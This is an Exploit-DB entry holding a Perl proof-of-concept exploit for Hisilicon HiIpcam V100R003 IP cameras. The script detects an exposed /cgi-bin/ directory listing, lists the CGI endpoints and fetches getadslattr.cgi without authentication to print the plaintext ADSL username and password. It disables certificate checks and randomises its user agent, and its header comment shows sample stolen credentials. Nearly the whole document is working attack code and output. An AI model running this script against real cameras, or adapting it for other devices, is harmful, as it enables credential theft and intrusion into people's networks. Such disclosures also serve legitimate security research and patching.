Hisilicon HiIpcam V100R003 Remote ADSL – Credentials Disclosure

  • 作者: Todor Donev
    日期: 2019-09-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47405/
  • #!/usr/bin/perl -w
    #
    #Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
    #
    #Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
    #
    #
    #	#[ 
    #	#[ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
    #	#[ =============================================================
    #	#[ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
    #	#[
    #	#[Disclaimer:
    #	#[This or previous programs are for Educational purpose
    #	#[ONLY. Do not use it without permission. The usual 
    #	#[disclaimer applies, especially the fact that Todor Donev
    #	#[is not liable for any damages caused by direct or 
    #	#[indirect use of the information or functionality provided
    #	#[by these programs. The author or any Internet provider 
    #	#[bears NO responsibility for content or misuse of these 
    #	#[programs or any derivatives thereof. By using these programs 
    #	#[you accept the fact that any damage (dataloss, system crash, 
    #	#[system compromise, etc.) caused by the use of these programs
    #	#[are not Todor Donev's responsibility.
    #	#[ 
    #	#[ Use them at your own risk!
    #	#[
    #	#[ Initializing the browser
    #	#[ Server: thttpd/2.25b 29dec2003
    #	#[ The target is vulnerable
    #	#[
    #	#[ Directory Traversal
    #	#[
    #	#[ /cgi-bin/..
    #	#[ /cgi-bin/adsl_init.cgi
    #	#[ /cgi-bin/chkwifi.cgi
    #	#[ /cgi-bin/ddns_start.cgi
    #	#[ /cgi-bin/getadslattr.cgi
    #	#[ /cgi-bin/getddnsattr.cgi
    #	#[ /cgi-bin/getinetattr.cgi
    #	#[ /cgi-bin/getinterip.cgi
    #	#[ /cgi-bin/getnettype.cgi
    #	#[ /cgi-bin/getupnp.cgi
    #	#[ /cgi-bin/getwifi.cgi
    #	#[ /cgi-bin/getwifiattr.cgi
    #	#[ /cgi-bin/ptzctrldown.cgi
    #	#[ /cgi-bin/ptzctrlleft.cgi
    #	#[ /cgi-bin/ptzctrlright.cgi
    #	#[ /cgi-bin/ptzctrlup.cgi
    #	#[ /cgi-bin/ptzctrlzoomin.cgi
    #	#[ /cgi-bin/ptzctrlzoomout.cgi
    #	#[ /cgi-bin/ser.cgi
    #	#[ /cgi-bin/setadslattr.cgi
    #	#[ /cgi-bin/setddnsattr.cgi
    #	#[ /cgi-bin/setinetattr.cgi
    #	#[ /cgi-bin/setwifiattr.cgi
    #	#[ /cgi-bin/testwifi.cgi
    #	#[ /cgi-bin/upnp_start.cgi
    #	#[ /cgi-bin/upnp_stop.cgi
    #	#[ /cgi-bin/wifi_start.cgi
    #	#[ /cgi-bin/wifi_stop.cgi
    #	#[ 
    #	#[ File Reading
    #	#[
    #	#[ var ip = "" ;
    #	#[ var adslenable = "" ;
    #	#[ var username = "hacker" ;
    #	#[ var password = "133337" ;
    #	#[ var dnsauto = "1" ;
    #	#[ var dns1 = "8.8.8.8" ;
    #	#[ var dns2 = "8.8.4.4" ;
    #
    # 
    use strict;
    use HTTP::Request;
    use LWP::UserAgent;
    use WWW::UserAgent::Random;
    use HTML::TreeBuilder;
    $| = 1;    # unbuffered STDOUT so each "[ ..." progress line shows up immediately
    # Base URL of the target camera, taken from the first command-line argument.
    # Falls back to the device's usual LAN address when nothing is supplied.
    my $host = shift(@ARGV) || 'https://192.168.1.1/';
    # Clear the terminal and home the cursor before the banner is printed.
    print "\033[2J\033[0;0H";
    
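    # Banner printed at start-up. The original kept this as one ~3 KB string of
    # "\xNN" escapes, which hid its content from anyone skimming the script; an
    # obfuscated string literal in an exploit is exactly what a supply-chain
    # reviewer should stop on. Hand-decoding the escapes shows it is only the
    # title, author line and disclaimer already given in the header comment, so
    # it is reproduced here in plain text (trailing/double spaces kept as in the
    # decoded bytes). Single quotes are used where a line contains "@", which
    # would otherwise interpolate as an array.
    my $banner = join "\n",
        '[ ',
        '[ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure',
        '[ ' . ('=' x 61),
        '[ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>',
        '[',
        '[  Disclaimer:',
        '[  This or previous programs are for Educational purpose',
        '[  ONLY. Do not use it without permission. The usual ',
        '[  disclaimer applies, especially the fact that Todor Donev',
        '[  is not liable for any damages caused by direct or ',
        '[  indirect use of the  information or functionality provided',
        '[  by these programs. The author or any Internet provider ',
        '[  bears NO responsibility for content or misuse of these ',
        '[  programs or any derivatives thereof. By using these programs ',
        '[  you accept the fact that any damage (dataloss, system crash, ',
        '[  system compromise, etc.) caused by the use  of these programs',
        "[  are not Todor Donev's responsibility.",
        '[   ',
        '[ Use them at your own risk!',
        '[',
        '';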
    
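    print $banner;

    # Usage guard: the target must be a full URL with an http(s) scheme.
    # The original accepted anything starting with "http"; require the actual
    # "http://" or "https://" prefix so a bare host name is rejected up front.
    if ($host !~ m{\Ahttps?://}i) {
        print "[ e.g. perl $0 https://target:port/\n";
        exit 1;
    }
    # The default and the usage example both end in "/", and every path below
    # is joined with its own leading "/", so strip trailing slashes to avoid
    # requesting "//cgi-bin/".
    (my $base = $host) =~ s{/+\z}{};

    print "[ Initializing the browser\n";
    my $user_agent = rand_ua("browsers");
    # NOTE(security): certificate/hostname verification is disabled so the tool
    # works against the self-signed certificates these cameras ship with. That
    # also means anyone on the path to the target can read or rewrite the
    # exchange -- including the credentials this tool pulls back -- so run it
    # only from a network position you trust.
    my $browser = LWP::UserAgent->new(
        protocols_allowed => ['http', 'https'],
        ssl_opts          => { verify_hostname => 0 },
    );
    $browser->timeout(30);
    $browser->agent($user_agent);

    # GET $path under the target base URL and return the HTTP::Response.
    # LWP::UserAgent->request always returns a response object -- connection,
    # DNS, TLS and timeout failures come back as a synthetic 5xx carrying the
    # header "Client-Warning: Internal response" -- so the original
    # `request(...) or die "...: $!"` could never fire and $! was meaningless.
    # Callers must inspect the response instead.
    my $get = sub {
        my ($path) = @_;
        my $req = HTTP::Request->new(
            GET => $base . $path,
            [ Content_Type => "application/x-www-form-urlencoded", Referer => $host ],
        );
        return $browser->request($req);
    };

    # Step 1: does the web server hand out a directory index for /cgi-bin/?
    my $index = $get->("/cgi-bin/");
    my $client_warning = $index->header('Client-Warning');
    if (defined $client_warning && $client_warning eq 'Internal response') {
        # No HTTP exchange happened at all; say so instead of reporting the
        # target as "not vulnerable".
        print "[ Exploit Failed: ", $index->status_line, "\n";
        exit 1;
    }
    if ($index->code == 401) {
        print "[ 401 Unauthorized!\n";
        exit 1;
    }
    my $server = $index->header('Server');
    print "[ Server: ", (defined $server ? $server : ''), "\n";

    # Match against the body only; the original matched the whole
    # headers+body string, which cannot change the outcome here but is sloppy.
    my $body = $index->decoded_content;
    $body = $index->content unless defined $body;
    if (!defined $body || $body !~ m{<H2>Index of /cgi-bin/</H2>}) {
        print "[ Exploit failed! The target isn't vulnerable\n";
        exit 1;
    }
    print "[ The target is vulnerable\n";

    # Step 2: print every link the index exposes. Despite the label, this is an
    # exposed directory listing of /cgi-bin/, not a path-traversal bug.
    print "[\n[ Directory Traversal\n";
    my $tree = HTML::TreeBuilder->new_from_content($body);
    for my $anchor ($tree->look_down(_tag => 'a')) {
        my $href = $anchor->attr('href');
        print "[ ", (defined $href ? $href : ''), "\n";
    }
    $tree->delete;    # HTML::TreeBuilder trees are self-referential; free explicitly

    # Step 3: getadslattr.cgi returns the ADSL/PPPoE settings -- including the
    # plaintext username and password, see the sample output in the header
    # comment -- without any authentication. Dump it line by line.
    my $attrs = $get->("/cgi-bin/getadslattr.cgi");
    if (!$attrs->is_success) {
        print "[ Exploit Failed: ", $attrs->status_line, "\n";
        exit 1;
    }
    print "[\n[ File Reading\n";
    my $text = $attrs->decoded_content;
    $text = $attrs->content unless defined $text;
    print "[ ", $_, "\n" for split /\n/, (defined $text ? $text : '');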